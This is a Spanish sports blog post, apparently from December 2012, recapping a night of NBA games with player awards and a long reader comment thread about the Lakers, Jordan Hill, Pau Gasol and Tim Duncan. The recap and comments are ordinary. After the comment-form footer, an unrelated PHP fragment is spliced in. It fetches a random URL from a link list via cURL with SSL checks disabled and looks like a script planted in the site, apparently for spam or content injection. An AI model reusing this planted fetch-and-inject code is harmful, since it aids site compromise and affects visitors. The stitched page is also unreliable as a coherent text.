La Crónica: Meeks&Gun

01 de December de 2012 por Sancho88

Lakers disfrutó de una noche apoteósica en el Staples al vencer cómodamente a unos Nuggets sin rey ni trono (103-122). Mañana será su última juerga en casa contra los Magic antes de salir a jugar una gira de 9 partidos fuera (por solo 4 en casa) en un mes de diciembre que se presenta como la última oportunidad para confirmarse como un verdadero aspirante al título y, si eso es verdad, poder copar uno de los cuatro primeros puestos de Conferencia Oeste que dan la ventaja de campo en las series finales. Esos 9 partidos serán la piedra de toque, puesto que hasta el momento en los 5 partidos disputados fuera de casa, Lakers solo consiguieron ganar uno, el que los enfrentó a los Mavericks en Dallas.

Anoche, sin embargo, todo funcionó y los Lakers fueron un auténtico rodillo. Jugaron con bastante fluidez el Run&Gun de D’Antoni, con momentos de gran clarividencia en los que Bryant, Pau y Duhon pusieron los pases de canasta (24 en total, a 8 por cabeza), y el resto se dedicaron a firmar una actuación exquisita desde el 7,25 consiguiendo igualar con 17 triples el record de la franquicia en Temporada Regular. El principal culpable del gran 52% final (17/33) fue nada más y nada menos que nuestro adorado Jodie Meeks. El ex de Philadelphia igualó con 21 puntos la mejor marca anotadora de su carrera, y su 7/8 en triples en apenas 17 minutos fue el elemento diferenciador a favor de los Lakers. Sólo anotó de 3 y en la comunidad Hoops del blog se nos caen las lágrimas de alegría. También estuvo magistral, decidido, dañino y decisivo desde el banquillo Antawn Jamison con 33 puntos y 12 rebotes. La llegada de D’Antoni beneficia mucho a su estilo de juego, rápido y directo. Recibe y tira con confianza, justo lo que les hace falta a los Lakers. Los 61 puntos del banquillo reflejan la implicación de unos jugadores que no creían en Brown, pero sí creen o al menos lo intentan de momento en Mike D’Antoni.

En el quinteto Bryant y Metta World Peace estuvieron discretos, Pau siguió cumpliendo su rol de jugar lejos de canasta repartiendo pases (qué poco nos gusta esto, ya que cuando llegue Nash al equipo no sabemos si tendrá siquiera rol), y Dwight Howard se destapó con un partido de los suyos, de los que se marcaba con los Magic. 28 puntos, 20 rebotes y 3 tapones para el animal. Claro que ni Mozgov, ni Koufos ni McGee hicieron nada por defenderlo. Incluso se permitió el lujo de tirarse una mandarina desde lejos y sumó así el segundo triple de su carrera. En los Nuggets Gallinari quiere ser ‘Il Capo’ pero le pasa como a Bargnani en los Raptors, le faltan litros de sangre y le sobra talento. Insuficiente para ser un líder; Iguodala pretende ‘enchufar’ a sus compañeros pero éstos están en las nubes, y McGee juega incomprensiblemente poco. No somos descreídos del método George Karl, pero lo cierto es que está fracasando con un equipo que debería aspirar a todo, al menos a priori.

Si Lakers jugaran todas las noches como ayer, quizá le estaría discutiendo a estas horas el primer puesto del Oeste a los Grizzlies. Anoche, otra fiesta más en el FedEx Forum de los pupilos de Lionel Hollins. La víctima esta vez: Detroit Pistons (78-90). Marc Gasol firmó su primer doble-doble de la temporada (17-11) además de 3 asistencias y 4 tapones y fue el lider destacado de su equipo. Mike Conley apareció en el zaparzo de los Grizzlies al final del tercer cuarto con 9 puntos consecutivos (para 17 en total) y Rudy Gay le ayudó con otros 6 puntos (para un total de 18), que les dieron a los Grizzlies una ventaja cómoda de 10 puntos hasta el final del encuentro. Importante como siempre la aportación desde el banquillo de hombres como Bayless o Darrell Arthur, y por parte de los Pistons el mejor fue Greg Monroe con 17 puntos y 9 rebotes. No obstante, sus 7 pérdidas de balón lideraron este apartado en el equipo de ‘Motown’, que acumularon un total de 22. Principal ladron Conley con 6.

En el partido de Cuatro, no pasó casi nada (78-96). Se suponía que sin Rondo en la pista, Damian Lillard pondría en apuros a los verdes, pero no sucedió nada de eso y los Celtics se fueron de 20 al descanso. En la reanudación Portland no consiguió bajar de los 15 puntos y tengo el recuerdo de irme a la cama escuchando a Daimiel hablar de un montón de padres fallecidos de jugadores de los Blazers y después creo que he soñado algo extraño. En fin. El banquillo de Oregón sigue sin espabilar, hay tipos que podrían hacer cosas interesantes como Freeland pero no juegan apenas, Meyers Leonard sigue dando la cara y Aldridge fue el único que se salvó de la quema general (23 puntos y 8 rebotes). En los Celtics hubo muy buenas rotaciones, en las que Jeff Green volvió a aprovechar muy bien sus oportunidades (19 puntos en 22 minutos) y Courtney Lee no lo hizo mal asumiendo el complicado papel de Rajon Rondo, que cumplió anoche su primer partido de suspensión tras la tangana. Al menos, defensivamente Lee secó a Lillard y sus números no fueron nada malos. Es una lástima que aún no se haya asentado con un rol claro en el equipo.

En Oklahoma, los Thunder siguen confirmando las buenas sensaciones y anoche adelantaron a los Spurs en la clasificación. Gran victoria en casa contra los Jazz (94-106) con un Russell Westbrook desatado que a punto estuvo de firmar un cuádruple-doble. 23 puntos, 13 rebotes, 8 asistencias y 7 robos de balón el animalito. Durant y Martin le ayudaron en la anotación (44 puntos entres los dos) e Ibaka puso 7 tapones. En los Jazz destacó Enes Kanter con 18 puntos y 7 rebotes en 15 minutos. Está pidiendo a gritos jugar más. Jefferson en su línea, 16-11.

En el resto de la jornada, 5 partidos se jugaron en el Este y otros 2 en el Oeste. Empezamos a resumir por el Oeste. Minnesota volvió a la senda de la victoria a costa de unos Bucks que se hunden por culpa del cabezón de Skiles (85-95). El tipo ya no le da bola a Ilyasova, quien se une al club de Gooden, sale con Henson de titular y está tirando una perfecta oportunidad de avanzar con respecto al año pasado y sorprender entrando entre los 8 mejores del Este. Entre Love y Pekovic anotaron 29 puntos y recogieron 30 rebotes para castigar a Skiles (y eso que Love jugaba mermado por problemas estomacales), y el ‘backourt’ de los Wolves también estuvo a gran altura. Barea 15, Ridnour 16 y Shved 16 puntos y 4 triples desde Rusia con amor. De nada valió la faraónica actuación de Larry Sanders, un triple-doble en puntos, rebotes y tapones (10-12-10) que se va al limbo de los triples-dobles inservibles. Lo recogeremos nosotros con sumo gusto en el MEV.

En Sacramento los Kings volvieron a desaprovechar sus opciones de victoria en el ‘clutch time’ (97-92) y fueron víctimas de la pareja David West-George Hill. 31 puntos y 11 rebotes para el alero y 25-6-8 para el base. Paul George y Roy Hibbert siguen desaparecidos y en los Kings no jugó Tyreke Evans por problemas en la rodilla izquierda y Cousins fue el mejor de los suyos con 19 puntos y 16 rebotes. Interesante Jimmer Fredette que ha conseguido asimilar por fin un rol en el equipo, concretamente el de tirador, y no lo está haciendo nada mal esta temporada con unos porcentajes muy buenos. Anoche 12 puntos.

Ya en el Este, los Cavs cortaron la racha de victorias de los Hawks en Atlanta (113-111) con una espectacular remontada en el último cuarto gracias al buen hacer de Pargo y a la bandeja en el último segundo tras rebote ofensivo de Alonzo Gee. Waiters siguió aportando buenas sensaciones con 21 puntos y Varejao volvió a repetir una actuación de las de Kevin Love el año pasado: 20 puntos y 18 rebotes. Se dice pronto. En los Hawks Josh Smith fue el mejor con 25 puntos y 8 rebotes.

En Nueva York los Knicks se siguen recuperando del derby contra Brooklyn e igualaron anoche su record (11-4) con una fácil victoria frente a los Wizards (87-108). Carmelo fue el líder con un 20-5-5 y J.R. Smith también aportó 20 puntos desde el banquillo.

No pierden comba tampoco los propios Nets, que siguen como la segunda mejor defensa del campeonato y ayer lo demostraron en Orlando (98-86). Partidazos de Joe Johnson, con 22 puntos (10/16 en TC), bien acompañado por los 20 puntos de Gerald Wallace. Deron Williams sigue bastante insulso, y entre Blatche y Reggie Evans suplieron muy bien la baja de López.

En el primer partido de la jornada los Raptors por fin supieron gestionar un final de partido igualado (97-101) frente a los Suns, y eso que Bargnani solo anotó 4 puntos. DeMar DeRozan (se me hace difícil ponerle bien el nombre, leñe) jugó un partidazo (23-8-4) y Calderón también lo hizo muy bien desde el banquillo, con 13 puntos y 9 asistencias.

Y por último, en Charlotte los Bobcats volvieron a perder luchando hasta el final, como siempre, contra unos sobrios Sixers (104-98) liderados por el enrachado Evan Turner (25-10), biens secundado por Jason Richardson con 22 puntos, y alimentado por las 15 asistencias de Jrue Holiday. En los Bobcats revivió Biyombo con 14 puntos y 7 rebotes, y el Rookie Jeff Taylor sigue a gran nivel, anoche 16 puntos. Ben Gordon (19-4-5) sigue justificando mi apuesta personal en la Hoops y fue el mejor de su equipo.

PREMIOS

MVP: Ninguna duda. Russell Westbrook fue el mejor de la noche liderando a los Thunder contra Utah. 23 puntos, 13 rebotes, 8 asistencias y 7 robos de balón. Vale, perdió 8 balones, pero da igual, rozó el cuádruple-doble y nos encanta que sea tan imprevisible. Es una bestia. Partidazo también de otra bestia parda llamada Dwight Howard en la victoria de los Lakers contra Nuggets (28-20) y de David West en la victoria de los Pacers en Sacramento (33-11).

Rookie: Casi se hace raro no ver a Lillard en esta casilla, pero ayer estuvo fatal. El premio de esta noche se va a las dependencias de Dion Waiters. 21 puntos y 7 asistencias para la bolita número 4 del pasado ‘draft’. Gran temporada para un jugador del que muchos esperaban que fracasase. Shved también jugó muy bien en Minnesota (16-3-5).

Sorpresa: Jodie Meeks. Sus 7 triples nos volvieron locos. El tipo salió en el segundo cuarto y ‘clavó’ 5 seguidos en 5 minutos. Fue todo un espectáculo. También nos sorprendió anoche Enes Kanter. En 15 minutos anotó 18 puntos y cogió 7 rebotes. Millsap cada día aporta menos y nos gustaría ver a Favors o al propio Kanter saliendo al lado de Jefferson algún partido. El triple-doble de Larry Sanders, con 10 puntos, 12 rebotes y 10 tapones es una grata sorpresa para un jugador con un potencial defensivo impresionante. Este tipo directamente salió a la cancha y en 3 minutos puso 5 tapones. Estas cosas no se sabe cómo pasan, pero pasan. Sucedió todo en un arrebato ‘Manuteboliense’ o ‘Mutombiano’ sobre Pekovic. El montenegrino habrá soñado con él a buen seguro.

Decepción: No lo vamos a negar. Muchos trasnochamos anoche para ver a la sensación entre los rookies, Damian Lillard, pero éste nos defraudó un pelín contra los Celtics. El Garden impone. Se quedó en 8 puntos, 3 rebotes y 3 asistencias, pero esperábamos mucho más por su parte. El 2/11 de Batum en este mismo partido fue sangrante también. Sobre Stuckey podríamos hacer mucha sangre este año. Su 3/11 anoche fue otra muestra más de que este chico no ha empezado todavía a jugar esta temporada. Los Pistons deberían haber ganado más partidos y él no debería ser suplente en un equipo tan malo. Lamentable.

Esfuerzo en vano: Aquí también ponemos a Sanders. Su 10-12-10 no valió para nada por culpa de la obcecación de su ‘coach’. Son lo peor los entrenadores como Skiles, que trabajan a base de venganzas con sus mejores jugadores. Con Ilyasova y Gooden probablemente mantendría opciones de jugar Playoffs. El 19-16 de Cousins o el 25-8-3- de Josh Smith también deben doler, sobre todo porque no valieron para nada.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

31 comentarios a esta entrada

  1. Esteban dice:
    #1

    exelente analisis

    para la sorpresa, andray blatche sale de titular y se va con 13 puntos y 8 rebotes, en un año de despege total para el, quien lo hubiera dicho? en mi analisis le di algunas chances de recuperarse saliendo desde el banco, mayores a las de childress y no me equivoque, pero esta superando cualquier expectativa

    los nets ayer, sin lopez demuestan sus variantes y profunidad, PARTIDAZO de wallace, triple tras triple abierto, super defensa y carga brutal a los rebotes, con esa intensidad es un jugador extraordinario

    muy bien jojo, tiros dificiles, todos adentro, se recupera un poco de su pesimo comienzo para salir del pozo negro donde se habia metido, una version de jojo y wallace en este nivel, ponen a los NETS a mi juicio por sobre knicks

    deron sigue raro, tira mas de la cuenta, pero aun asi es genial, jugando de 1 y de a ratos de 2

    sin lopez esperaba ver bastante a TELETOVIC, bueno esta claro que every no ve muy mal por que 4 minutos no es jugar

      Citar

  2. Jose Luis dice:
    #2

    Sensacional crónica Sancho, como siempre un placer leerte, estos textos son para disfrutarlos…

    El único pero, Waiters fue número 4 del draft 🙂

    Está claro que los Lakers juegan mejor con tiradores abiertos que abran hueco a Howard y Pau abajo. Ayer se vio una rotación casi de 3 hombre, pues Jordan Hill jugó poco, y Pau jugó de pívot con Jamison de 4. Esperemos que pueda jugarse más bolas de poste bajo, aunque ayer dejó pasar 2 oportunidades que tuvo… en fin. Los tiradores van a estar solos para tirar, más aún cuando llegue Nash, y el día que rocen el 40% pues serán muchos puntos porque los Lakers van a tirar muchos triples. Evidentemente también tendrán días malos y ahí es donde se notará más la lacra de estos Lakers, los tiros libres, pues se jugará más por dentro, recibirán más faltas en situaciones de poste y de penetración, y es donde hay que estar acertado. Aquí hay un buen artículo hablando de ello:

    http://www.nbamaniacs.com/articulos/lakers-el-drama-de-los-tiros-libres/?utm_source=dlvr.it&utm_medium=twitter

    Por lo demás… con lo bien que empezó Bargnani el año pasado, que estaba haciendo numerazos interrumpidos por sus lesiones… este año está decepcionando y de qué manera.

      Citar

  3. Sancho88 dice:
    #3

    Ya está cambiado Jose Luis. Muchas gracias por avisar y me alegro que os haya gustado la crónica!!

      Citar

  4. Jose Luis dice:
    #4

    Perfecta, como siempre 🙂 las gracias a ti por hacernos disfrutar de esta manera

      Citar

  5. Esteban dice:
    #5

    Jose Luis:
    Sensacional crónica Sancho, como siempre un placer leerte, estos textos son para disfrutarlos…

    El único pero, Waiters fue número 4 del draft

    Está claro que los Lakers juegan mejor con tiradores abiertos que abran hueco a Howard y Pau abajo. Ayer se vio una rotación casi de 3 hombre, pues Jordan Hill jugó poco, y Pau jugó de pívot con Jamison de 4. Esperemos que pueda jugarse más bolas de poste bajo, aunque ayer dejó pasar 2 oportunidades que tuvo… en fin. Los tiradores van a estar solos para tirar, más aún cuando llegue Nash, y el día que rocen el 40% pues serán muchos puntos porque los Lakers van a tirar muchos triples. Evidentemente también tendrán días malos y ahí es donde se notará más la lacra de estos Lakers, los tiros libres, pues se jugará más por dentro, recibirán más faltas en situaciones de poste y de penetración, y es donde hay que estar acertado. Aquí hay un buen artículo hablando de ello:

    http://www.nbamaniacs.com/articulos/lakers-el-drama-de-los-tiros-libres/?utm_source=dlvr.it&utm_medium=twitter

    Por lo demás… con lo bien que empezó Bargnani el año pasado, que estaba haciendo numerazos interrumpidos por sus lesiones… este año está decepcionando y de qué manera.

    es interesante ese movimiento, usando a pau de centro y a jamison estilo odom, rotando con los otros dos

    esa rotacion de 3 hombres deja fuera de accion a jordan hill, QUIEN TIENE A MI JUICIO UN MUY PERO MUY BUEN MERCADO, puede ser centro titular de varias frranquicias a gran nivel, ahora se me ocurren bucks, warrios, a ambos les vendrian bien sus rebotes e intesidad

    esto le daria a los lakers una nueva moneda de cambio para reforzarse,

    ademas esta clark en caso de q se necesite un interno mas en la rotacion,. como sucedia antes con powell y mbenga, q entraban para darle algun minuto de descanso a pau, bynum y odom

      Citar

  6. MagicJohnson32 dice:
    #6

    Festival de Meeks y Jamison, curiosamente los dos jugadores más grises con Mike Brown. Ojo, porque los periodistas ya han empezado a preguntarle a D’Antoni si piensa poner a Jamison de titular en lugar de Gasol (“todavía no”, contestó). Yo no lo haría, porque Jamison está siendo últimamente el gran 6º que se esperaba, y un 6º de ese nivel resulta realmente desequilibrante. Meeks va a tener sus días, como cualquier especialista, pero Jamison debe contribuir con regularidad y desde la llegada de D’Antoni parece que puede hacerlo. Bryant y MWP están en muy buena forma, y Howard va mejorando (muy bien anoche). Las piezas que faltan son la vuelta de Nash y el papel de Gasol, que yo creo que con su talento encontrará la manera de contribuir si recupera la actitud y mejora físicamente.

    Del resto de la madrugada, vi un rato a los Sixers de un sensacional Evan Turner (vaya racha lleva, un par de semanas fabulosas) y el final del Suns-Raptors. Phoenix perdonó con dos fallos de Scola, uno de Gortat y me pareció que hubo una falta a Shannon Brown en la jugada para empatar el partido a unos 10 segundos para el final. Ah, y a ratos (muy largos) Bargnani parece extremadamente mediocre. Cada vez más.

      Citar

  7. Sancho88 dice:
    #7

    Claro, en realidad tienes razón. Hill está totalmente infrautilizado, osea, se le ve como diciendo… vaya mierda, me aburro un huevo sentado en el banquillo cuando podría estar haciendo un 20-10 por noche. A mi juicio, Lakers deberían buscarle un traspaso como bien dices Esteban, de hecho, yo le veo volviendo a Houston para salir de titular junto a Asik. Algo así como un Blake+Hill por Terrence Jones+Morris. O algo incluso más impresionante con Pau+Hill, pero Lakers no iban a querer a Asik para ser suplente con ese contrato, teniendo en cuenta que Houston tiene muchas piezas pero no muchas son de gran valor. Jeremy Lin quizá cuando se retire Nash…

      Citar

  8. Ruxixón dice:
    #8

    Como dice Magic,Gasol encontrará la manera de contribuir,quizás distrubeyendo juego desde el poste y con un rol limitado en ataque,compartiendo muchos minutos con Jamison.El ex de Cavaliers no creo que sea de la partida ya que tal como se ha configurado la rotación es interesante que haya algo de aportación desde el banco y Jamison es el más fiable,pero parece claro que su rol de 6º hombre será de jugador que juega más que el titular en su posición.Malos tiempos para Pau,será una temporada muy larga para él.

      Citar

  9. simon dice:
    #9

    cito de la crónica “a costa de unos Bucks que se hunden por culpa del cabezón de Skiles (85-95). El tipo ya no le da bola a Ilyasova, quien se une al club de Gooden, sale con Henson de titular y está tirando una perfecta oportunidad de avanzar con respecto al año pasado y sorprender entrando entre los 8 mejores del Este.”
    No he seguido el tema Gooden y no se los motivos qe lo llevan al banco cuando el año pasado rindió bastante bien… pero lo de Ilyasova se lo ha buscado el solito… ni Skiles ni nadie… el solito se merece no jugar nada. Aunque viendo la jeta que tiene lo mismo hasta es lo q qiere… cobrar su contratazo sin dar ni palo al agua, sentadito en su banco… que tio mas chorizo…
    La crónica exquisita como siempre.
    PD: no veo a Hill siendo titular en casi ningun equipo y menos siendo “importante” en ningun sitio, lo de ser 20-10 ya ni de coña. Puede dar unos 12-18 minutos muy buenos en cuanto a intensidad. Pero de ahi a ser titular o ser un 20-10 hay muchos muchos pasos que no se si con su “calidad” se pueden dar.

      Citar

  10. melo15 dice:
    #10

    Vaya maquina Evan Turner, este chaval con confianza es un jugòn tremendo, como se nota cuando a los jugadores les das confianza, hace un año Turner estaba deshauciado y era un fracaso y ahora esta en 15pp 7rp y 4ap y subiendo. Este y Holiday son mi backcourt preferido, vaya cracks!

      Citar

  11. Jose Luis dice:
    #11

    Melo15, permíteme darte la enhorabuena por la increíble progresión que has hecho, tanto a nivel de conocimientos baloncestísticos como literarios-ortográficos, en el último año.

    Por lo demás, yo tampoco veo a Hill de center titular en ningún equipo aspirante a play-offs… su intensidad y su lucha son buenos en minutos reducidos, pero poco más, y casi siempre enfrentándose a suplentes también. Me parece un jugador muy válido, pero siempre de suplente.

      Citar

  12. HisRoyalAirness dice:
    #12

    Me duele ver a Pau así, qué forma de desaprovechar el talento….
    Vamos a ver, yo también pienso que en este plan Gasol va a tener que salir pero es simplemente porque no cuaja en el esquema. NO se puede regalar talento. Vas a recibir algo a cambio igual? NO. El talento desequilibra en Playoffs y puedes arrepentirte de deshacerte de él.

    La única posibilidad que creo que Laker se plantearía es traspasarlo a la Este. No creo que quieran cruzárselo en Playoffs. Como se mueva a la Este va a haber otro efecto Gasol porque NY, Miami y algunos otros van a acojonarse

      Citar

  13. MagicJohnson32 dice:
    #13

    ¿Hill 20-10? No sois cachondos vosotros ni nada…

      Citar

  14. HisRoyalAirness dice:
    #14

    Jose Luis:
    Melo15, permíteme darte la enhorabuena por la increíble progresión que has hecho, tanto a nivel de conocimientos baloncestísticos como literarios-ortográficos, en el último año.

    Por lo demás, yo tampoco veo a Hill de center titular en ningún equipo aspirante a play-offs… su intensidad y su lucha son buenos en minutos reducidos, pero poco más, y casi siempre enfrentándose a suplentes también. Me parece un jugador muy válido, pero siempre de suplente.

    Estoy de acuerdo con lo de Melo!!
    No está sufriendo para nada en su año sophomore, sino que sigue progresando!!
    A veces yo le pongo un poco verde por tirar de box scores para argumentar (como el otro día con lo de Marc, que creo que Sancho y Magic le dieron cera) pero es que es imposible estar enterado de todo

    Grande Melito!!

      Citar

  15. HisRoyalAirness dice:
    #15

    MagicJohnson32:
    ¿Hill 20-10? No sois cachondos vosotros ni nada…

    Supongo que se referiran a un partido porque si no…

    Por cierto, tengo que añadir e insistir con un tema:

    Si al final traspasan a Pau y el destino es un equipo decente, ese equipo se va a convertir en equipo de semis de conferencia por lo menos.
    No hablo de Wizards, Bobcats o basura de ese calibre pero unos Wolves o Hawks serían un peligro tremendo con un tipo con esa envergadura, ese talento y esa experencia.

    Creo que por primera vez es en España donde más se le infravalora (y en la prensa de L.A.), ayer salía un artículo en NBA.com con los analistas más punteros y de 10 sólo uno decía que lo traspasaría. Los otros decían que era alguien capaz de ser All-Star en cualquier equipo, el mejor jugador grande en el poste bajo y un jugador de élite. Curioso

      Citar

  16. melo15 dice:
    #16

    Jordan Hill no tiene nivel para ser titular en esta liga, le hacen falta bastantes cosas, asi como si creo que Asik si que puede ser un Center titular, Hill no. Son mas o menos el mismo tipo de jugadores, enérgicos, mancos ofensivamente…, Pero creo que Asik es bastante mas inteligente y defiende mejor.

      Citar

  17. txusma dice:
    #17

    MagicJohnson32:
    ¿Hill 20-10? No sois cachondos vosotros ni nada…

    Venga, Magic, ahora no te hagas el duro que yo sé que lo drafteaste en cierta liga fantástica. Te tenía el corazón robado…

      Citar

  18. Esteban dice:
    #18

    Habra q verlo a hill para saber, pero sus numeros por 36 minutos son bestiales, con los 20 si se exagera pero no con los 10 rebotes

    En cuanto si tiene nivel de PO, ya lo demostro con creces el año pasado, q puede jugar y rebotear contra los mejores

    En todo casi, si no es un titular en otro equipo, si puede ser un interno con muchos minutos, pensar q en el thunder jueha thabet lo dice todo

    Hill a tenido problemas de lesiones toda sau carrera, pero sano es un jugar sumamente util y su contrato es muy proporcionado a su rendimiento

    Q podrian entregar los warriors q le sea util a los lakers? Lastima la lesion de Rush…

    Dunleavy los bucks?

      Citar

  19. Sancho88 dice:
    #19

    Mira, igual 20-10 es exagerar, que yo siempre exagero ya sabeis, pero coño, 15-10 o 10-10 o algo así, sí que lo veo, y con relativa facilidad

      Citar

  20. Sempren dice:
    #20

    simon:
    cito de la crónica “a costa de unos Bucks que se hunden por culpa del cabezón de Skiles (85-95). El tipo ya no le da bola a Ilyasova, quien se une al club de Gooden, sale con Henson de titular y está tirando una perfecta oportunidad de avanzar con respecto al año pasado y sorprender entrando entre los 8 mejores del Este.”
    No he seguido el tema Gooden y no se los motivos qe lo llevan albanco cuando el año pasado rindió bastante bien… pero lo de Ilyasova se lo ha buscado el solito… ni Skiles ni nadie… el solito se merece no jugar nada. Aunque viendo la jeta que tiene lo mismo hasta es lo q qiere… cobrar su contratazo sin dar ni palo al agua, sentadito en su banco… que tio mas chorizo…
    La crónica exquisita como siempre.

    Por puntualizar algo una gran crónica… hombre, Henson jugó 19 minutos y se hizo un 10-7, no está del todo mal, a pesar de aderezarlo con 4 faltas. Y nunca se sabe con Ilyasova, pero en el último partido que me enteré de que jugara, ya como suplente, parecía que había mejorado sus prestaciones respecto a los primeros partidos (aunque sin estar acorde a su año pasado y a su sueldo, por otra parte)

      Citar

  21. MagicJohnson32 dice:
    #21

    Que sí, que Jordan Hill es un jugador útil, pero como suplente y para 20 minutos. Ha estado en tres equipos, ha tenido entrenadores de perfiles radicalmente distintos, y jamás ha pasado de un suplente correcto. Lo que vemos es lo que hay, que no está mal.

    Otros temas que se están tocando:

    – Sobre Skiles, estoy con Sancho. Es de estos entrenadores que aportan más problemas que soluciones y machacan la confianza de los jugadores.

    – Txus, no me saques el tema de aquel draft, que me enciendo…

    – HisRoyal, no es cuestión de valorar o infravalorar a Pau. Es que no está dando el nivel, ni físico ni de actitud. Nadie discute su calidad, lo que se le pide es que la demuestre. Precisamente Pau tiene muchas maneras de contribuir, no necesita anotar 20 puntos ni coger 15 rebotes.

    – Y yo no recuerdo haberle dado cera a Melo, jeje.

      Citar

  22. Esteban dice:
    #22

    Sancho88:
    Mira, igual 20-10 es exagerar, que yo siempre exagero ya sabeis, pero coño, 15-10 o 10-10 o algo así, sí que lo veo, y con relativa facilidad

    ahi si comparto plenamente

    HOY nets vs nets, los nets sin lopez, pero si ganan quedan como lideres del este

      Citar

  23. Sancho88 dice:
    #23

    Sempren: Por puntualizar algo una gran crónica… hombre, Henson jugó 19 minutos y se hizo un 10-7, no está del todo mal, a pesar de aderezarlo con 4 faltas. Y nunca se sabe con Ilyasova, pero en el último partido que me enteré de que jugara, ya como suplente, parecía que había mejorado sus prestaciones respecto a los primeros partidos (aunque sin estar acorde a su año pasado y a su sueldo, por otra parte)

    Claro, vamos a ver. Henson está rindiendo a un gran nivel, no creo que nadie nos esperásemos eso por su parte. En todos los workouts el pavo se le veía que cumplía, tenía buena mano, relativamente buenos movimientos de cara al aro, un tipo ágil, rápido… pero poco más. Y a mí me está sorprendiendo dando más de lo que esperaba por él. Pero todos sabemos que Ilyasova cojo es mejor que Henson, y que a pesar de estar mal, el otro día se picó contra los Bulls y fue la clave de la remontada. Aquí hay algo claro, es un toque de atención. Primero le tira al banquillo, luego lo hace bien y al día siguiente se lo carga directamente. Es una venganza, pero si yo soy el presi le digo a Skiles, motiva a este chico como puedas, pero no le hagas como a Gooden o vas fuera. Vamos, que le van a dar pasta por un tubo, como un jugador franquicia, y me dices que es para que no juegue? Es de coña.

    Ok, por merecimientos, soy el primero que digo que no lo merece porque se ha tocado las pelota todo el primer mes, pero sabes que si quieres ganar partidos y seguir con opciones en Playoffs tienes que repescar a Ilyasova y también a Gooden, dos tipos que tienen realmente talento. Y ojo, con esto no menosprecio a los jóvenes de Milwaukee, que tienen una actitud en la pista y una ética de trabajo muy buena. Tipos como Harris, Sanders, Udoh o el propio Mbah a Moute que todavía no ha debutado este año, te dan cosas muy buenas atrás, pero luego no pueden marcar la diferencia en ataque, y todos decíamos en el análisis que con Ellis y Jennings iba a ser insuficiente. Pues bien, se está viendo. Sin un Gooden o Ilyasova que pueda hacer partidos de 20 puntos los Bucks pierden, y es una pena porque lo tienen todo para poder meterse. Tienen plantilla de sobra para ser octavos en el Este. Ahora bien, depende de Skiles

      Citar

  24. HisRoyalAirness dice:
    #24

    MagicJohnson32:
    Que sí, que Jordan Hill es un jugador útil, pero como suplente y para 20 minutos. Ha estado en tres equipos, ha tenido entrenadores de perfiles radicalmente distintos, y jamás ha pasado de un suplente correcto. Lo que vemos es lo que hay, que no está mal.

    Otros temas que se están tocando:

    – Sobre Skiles, estoy con Sancho. Es de estos entrenadores que aportan más problemas que soluciones y machacan la confianza de los jugadores.

    – Txus, no me saques el tema de aquel draft, que me enciendo…

    – HisRoyal, no es cuestión de valorar o infravalorar a Pau. Es que no está dando el nivel, ni físico ni de actitud. Nadie discute su calidad, lo que se le pide es que la demuestre. Precisamente Pau tiene muchas maneras de contribuir, no necesita anotar 20 puntos ni coger 15 rebotes.

    – Y yo no recuerdo haberle dado cera a Melo, jeje.

    jajaja a lo mejor fue Deer. Es que el otro día dijo que teníamos a Marc sobrevalorado porque, por ejemplo, contra Lakers no había hecho tanto. A ver, estaba claro que el pobre había visto las stats y flipaba con lo que hablábamos de él (lo cual es muy de Marc, de dominar el partido con números normalísimos).
    Pero quién le ha visto y quien le ve, madre mía

      Citar

  25. Sancho88 dice:
    #25

    Pero Deer solo le defendió porque lo tiene en la hoops. Ahora para él es como si fuera Michael Jordan, jejej

      Citar

  26. Pop dice:
    #26

    Creo que acabo de ver por primera vez en mi vida a Tim Duncan gritando como un animal, mientras le hacía un juego de fintas + mate in-your-face a Marc.

      Citar

  27. HisRoyalAirness dice:
    #27

    Wade DESTRUYENDO a los Nets.

    Vuelve Flash

      Citar

  28. HisRoyalAirness dice:
    #28

    Y “The Big Fundamental” se me ha ido al descanso a 21-8-2 con sus añitos.

    Best power forward of all time

      Citar

  29. Pop dice:
    #29

    Qué barbaridad Duncan. Sobrehumano. ¿Qué vamos a hacer cuando se retire, por dios?

      Citar

  30. HisRoyalAirness dice:
    #30

    Pop:
    Qué barbaridad Duncan. Sobrehumano. ¿Qué vamos a hacer cuando se retire, por dios?

    Llorar. Mucho

      Citar

  31. Esteban dice:
    #31

    hay alguna duda que duncan fue el mejor 4 de la historia? digo fue por q ahora juega de 5, pero jugando de 4, 4 titulos y 3 mvp de finales no se le compara con ningun otro 4 habido y por haber, worthy? malone teia lo suyo, pero simpre fracaso y no me vengan con jodan, pues no aprovecho las dos temporadas que si aprovecho hakeem y en la 98/99 fue MVP de la regular y el mvp de finales se lo llevo tim

    para mi no ha habido otro igual, si garnett hubiese caido en san antonio pero las cosas se dieron asi

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>